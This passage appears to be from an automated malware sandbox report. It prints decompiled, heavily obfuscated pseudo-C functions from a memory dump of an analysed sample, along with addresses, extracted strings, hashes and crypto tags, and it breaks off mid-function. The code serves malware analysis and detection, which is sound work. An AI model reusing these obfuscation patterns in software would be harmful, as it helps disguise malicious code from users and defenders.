				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00238736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002459A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002459A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x0023ea50
0x0023ea57
0x0023ea5b
0x0023ea5d
0x0023ea5e
0x0023ea62
0x0023ea66
0x0023ea68
0x0023ea6d
0x0023ea75
0x0023ea77
0x0023ea7b
0x0023ea7e
0x0023ea88
0x0023ea90
0x0023ea95
0x0023ea9a
0x0023eaa2
0x0023eaaa
0x0023eab2
0x0023eab7
0x0023eac6
0x0023eac9
0x0023eacd
0x0023ead5
0x0023eadd
0x0023eae2
0x0023eaea
0x0023eaf2
0x0023eafa
0x0023eb0a
0x0023eb0e
0x0023eb16
0x0023eb1e
0x0023eb22
0x0023eb27
0x0023eb2f
0x0023eb37
0x0023eb3f
0x0023eb4c
0x0023eb4d
0x0023eb51
0x0023eb59
0x0023eb61
0x0023eb6f
0x0023eb73
0x0023eb7b
0x0023eb88
0x0023eb8c
0x0023eb94
0x0023eb9c
0x0023eba4
0x0023ebb1
0x0023ebb5
0x0023ebbd
0x0023ebc5
0x0023ebcd
0x0023ebd5
0x0023ebe2
0x0023ebe6
0x0023ebee
0x0023ebf6
0x0023ebfe
0x0023ec06
0x0023ec10
0x0023ec15
0x0023ec1d
0x0023ec25
0x0023ec2d
0x0023ec35
0x0023ec3a
0x0023ec42
0x0023ec50
0x0023ec55
0x0023ec5b
0x0023ec60
0x0023ec68
0x0023ec70
0x0023ec78
0x0023ec84
0x0023ec89
0x0023ec8f
0x0023ec97
0x0023eca3
0x0023eca8
0x0023ecae
0x0023ecb6
0x0023ecbe
0x0023ecca
0x0023eccf
0x0023ecd9
0x0023ece1
0x0023ecea
0x0023ecee
0x0023ecf6
0x0023ecf6
0x0023ed04
0x0023ed65
0x0023ed66
0x0023ed70
0x0023ed76
0x0023ed78
0x00000000
0x0023ed78
0x0023ed06
0x0023ed0c
0x0023ed46
0x0023ed4b
0x0023ed50
0x0023ed52
0x00000000
0x0023ed52
0x0023ed0e
0x0023ed14
0x00000000
0x0023ed1a
0x0023ed1a
0x00000000
0x0023ed1a
0x0023ed14
0x0023ed0c
0x00000000
0x0023ed04
0x0023eda3
0x0023edaf
0x0023edb2
0x0023edb4
0x0023edb9
0x0023edb9
0x0023edc6
0x0023edce

Strings

dR, xrefs: 0023EC60
n, xrefs: 0023EA88
--0, xrefs: 0023ED0E
<q7, xrefs: 0023EBC5
T8T, xrefs: 0023EB51
9v, xrefs: 0023EBCD
)?, xrefs: 0023EC42
--0, xrefs: 0023EA90

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction ID: b26461ee6086b019258c9ea88240351247bf71f64ba67c129e3c2fade1d54453
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 2E9152710083419BD768CF61C98981FFBF1FBC5B58F405A1DF2968A2A0C3B68A198F47

Uniqueness

Uniqueness Score: -1.00%

Function 0024A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0024A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0023F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00236636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00240ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00245A61( &_v8, E00248D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00238736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00240ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0023F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00245D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x0024a0bd
0x0024a0be
0x0024a0c5
0x0024a0c6
0x0024a0c7
0x0024a0cc
0x0024a0d4
0x0024a0d7
0x0024a0e1
0x0024a0e6
0x0024a0eb
0x0024a0f3
0x0024a101
0x0024a106
0x0024a10c
0x0024a114
0x0024a119
0x0024a121
0x0024a129
0x0024a131
0x0024a139
0x0024a141
0x0024a149
0x0024a151
0x0024a15e
0x0024a161
0x0024a165
0x0024a16d
0x0024a175
0x0024a17d
0x0024a182
0x0024a18a
0x0024a192
0x0024a19a
0x0024a1a2
0x0024a1aa
0x0024a1b2
0x0024a1ba
0x0024a1c2
0x0024a1c7
0x0024a1d4
0x0024a1d8
0x0024a1e0
0x0024a1e8
0x0024a1f2
0x0024a1f5
0x0024a201
0x0024a205
0x0024a20d
0x0024a215
0x0024a21d
0x0024a225
0x0024a22d
0x0024a232
0x0024a23a
0x0024a242
0x0024a24a
0x0024a256
0x0024a259
0x0024a265
0x0024a268
0x0024a26f
0x0024a273
0x0024a27b
0x0024a283
0x0024a28b
0x0024a293
0x0024a29b
0x0024a2a3
0x0024a2a8
0x0024a2b0
0x0024a2b8
0x0024a2c0
0x0024a2c8
0x0024a2d0
0x0024a2d8
0x0024a2dd
0x0024a2e5
0x0024a2ea
0x0024a2f2
0x0024a2fa
0x0024a2ff
0x0024a307
0x0024a30f
0x0024a314
0x0024a319
0x0024a321
0x0024a329
0x0024a331
0x0024a339
0x0024a341
0x0024a349
0x0024a351
0x0024a359
0x0024a361
0x0024a369
0x0024a371
0x0024a37c
0x0024a384
0x0024a38c
0x0024a394
0x0024a39c
0x0024a3a4
0x0024a3a9
0x0024a3b1
0x0024a3b9
0x0024a3c1
0x0024a3c9
0x0024a3d1
0x0024a3d1
0x0024a3d1
0x0024a3d6
0x0024a3d6
0x0024a3d6
0x0024a3d6
0x0024a3dc
0x00000000
0x00000000
0x0024a3e2
0x0024a4cb
0x00000000
0x0024a3e8
0x0024a3ee
0x0024a592
0x0024a598
0x0024a59a
0x0024a59a
0x0024a5ad
0x0024a5b2
0x0024a5b6
0x0024a59a
0x0024a3f4
0x0024a3f6
0x0024a462
0x0024a466
0x0024a46a
0x0024a46c
0x0024a485
0x0024a494
0x0024a499
0x0024a49c
0x0024a4a0
0x0024a4a1
0x0024a4a6
0x0024a4a7
0x0024a4ad
0x0024a4b1
0x0024a4b1
0x0024a4b6
0x0024a4ba
0x0024a4bf
0x00000000
0x0024a3f8
0x0024a3fe
0x0024a450
0x0024a455
0x0024a458
0x0024a3d1
0x0024a3d1
0x0024a3d1
0x00000000
0x0024a3d1
0x0024a400
0x0024a406
0x00000000
0x0024a40c
0x0024a418
0x0024a419
0x0024a423
0x0024a425
0x0024a432
0x00000000
0x0024a432
0x0024a406
0x0024a3fe
0x0024a3f6
0x0024a3ee
0x0024a5ba
0x0024a5cf
0x0024a5cf
0x0024a4db
0x0024a543
0x0024a547
0x0024a549
0x0024a54f
0x0024a551
0x0024a55c
0x0024a561
0x0024a568
0x0024a56b
0x0024a56f
0x0024a573
0x0024a573
0x0024a578
0x0024a57f
0x00000000
0x0024a4dd
0x0024a4e3
0x0024a532
0x0024a539
0x00000000
0x0024a4e5
0x0024a4eb
0x00000000
0x0024a4f1
0x0024a4f1
0x0024a4f4
0x0024a511
0x0024a516
0x0024a519
0x0024a51b
0x0024a3d1
0x0024a3d1
0x0024a3d1
0x00000000
0x0024a3d1
0x0024a3d1
0x0024a4eb
0x0024a4e3
0x00000000
0x0024a584
0x0024a584
0x00000000
0x0024a590

Strings

2a, xrefs: 0024A3A9
g]ht, xrefs: 0024A2C8
/, xrefs: 0024A28B
V=, xrefs: 0024A394
c~, xrefs: 0024A273
_, xrefs: 0024A151
L, xrefs: 0024A331

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
Instruction ID: 05664ee7300c47d88b8e96b90979ea82c034e7e09d735e01ec121f816f5dbe68
Opcode Fuzzy Hash: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
Instruction Fuzzy Hash: 7CD161725187828FD368CF65C48991FBBE2BFC4758F60890CF596862A0D7B49919CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00247F1F, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00247F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00247F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0023D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00247F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00247F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0023D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00247F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0023D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00247F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00247f1f
0x00247f22
0x00247f2c
0x00247f34
0x00247f40
0x00247f42
0x00247f44
0x00247f48
0x00247f4d
0x00247f55
0x00247f60
0x00247f65
0x00247f6b
0x00247f73
0x00247f7b
0x00247f83
0x00247f8b
0x00247f93
0x00247f9b
0x00247fa0
0x00247fa8
0x00247fb0
0x00247fb8
0x00247fbd
0x00247fc7
0x00247fca
0x00247fce
0x00247fd6
0x00247fe6
0x00247fea
0x00247ff2
0x00247ffa
0x00248002
0x0024800a
0x00248012
0x0024801a
0x00248022
0x0024802a
0x00248032
0x0024803a
0x00248042
0x0024804a
0x00248052
0x0024805a
0x00248062
0x00248067
0x0024806f
0x00248077
0x0024807f
0x00248084
0x0024808c
0x00248094
0x002480a0
0x002480a3
0x002480a7
0x002480af
0x002480b7
0x002480bf
0x002480c9
0x002480cd
0x002480d5
0x002480dd
0x002480e5
0x002480ed
0x002480f5
0x0024810b
0x0024810f
0x00248114
0x0024811c
0x00248124
0x00248134
0x00248138
0x00248144
0x00248149
0x0024814f
0x00248157
0x00248164
0x00248165
0x00248169
0x00248171
0x00248179
0x00248181
0x00248186
0x0024818e
0x00248196
0x0024819b
0x002481a3
0x002481ab
0x002481b3
0x002481bb
0x002481bf
0x002481c7
0x002481d4
0x002481dd
0x002481e1
0x002481e9
0x002481f6
0x002481fa
0x00248202
0x0024820a
0x00248218
0x0024821c
0x0024821c
0x00248224
0x00248224
0x00248224
0x00248224
0x00248226
0x00000000
0x00000000
0x0024822c
0x002482c7
0x002482c8
0x002482cd
0x002482d0
0x002482d5
0x00000000
0x00248232
0x00248238
0x002482b5
0x00000000
0x0024823a
0x00248240
0x0024829d
0x002482a1
0x002482a6
0x002482a9
0x002482ae
0x00000000
0x00248242
0x00248248
0x0024827b
0x0024827c
0x00248281
0x00248284
0x00248289
0x00000000
0x0024824a
0x00248250
0x00000000
0x00248256
0x0024825e
0x00248267
0x00248267
0x00248250
0x00248248
0x00248240
0x00248238
0x00248269
0x00248272
0x00248272
0x002482e2
0x00248368
0x0024836c
0x00248371
0x00248374
0x00248379
0x00000000
0x002482e4
0x002482ea
0x00248346
0x00248347
0x0024834c
0x0024834f
0x00248351
0x00000000
0x002482ec
0x002482f2
0x00248326
0x0024832a
0x0024832f
0x00248332
0x00248337
0x00000000
0x002482f4
0x002482fa
0x00000000
0x002482fc
0x00248304
0x00248305
0x0024830a
0x0024830d
0x00248312
0x00000000
0x00248312
0x002482fa
0x002482f2
0x002482ea
0x00000000
0x0024837b
0x0024837b
0x00000000

Strings

~, xrefs: 0024803A
,H, xrefs: 002481AB
S,, xrefs: 00248157
9c%', xrefs: 002482EC
9c%', xrefs: 002482B5
bh, xrefs: 0024806F
XW, xrefs: 0024808C

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$~
API String ID: 0-4263808623
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: a9f81e8d668acd391d52818b89eb62460bb7722323642bd61be0ee2dc6d5c687
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: 06B131B29283818FD358CF25D98A40FFBE1BB84748F048A1DF59696260DBB5D909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002369A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002369A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
